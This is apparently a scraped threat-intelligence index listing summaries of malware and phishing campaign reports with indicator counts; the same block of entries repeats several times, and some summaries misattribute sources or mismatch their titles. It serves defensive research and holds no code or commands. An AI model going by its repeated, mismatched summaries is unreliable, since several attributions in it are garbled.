This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
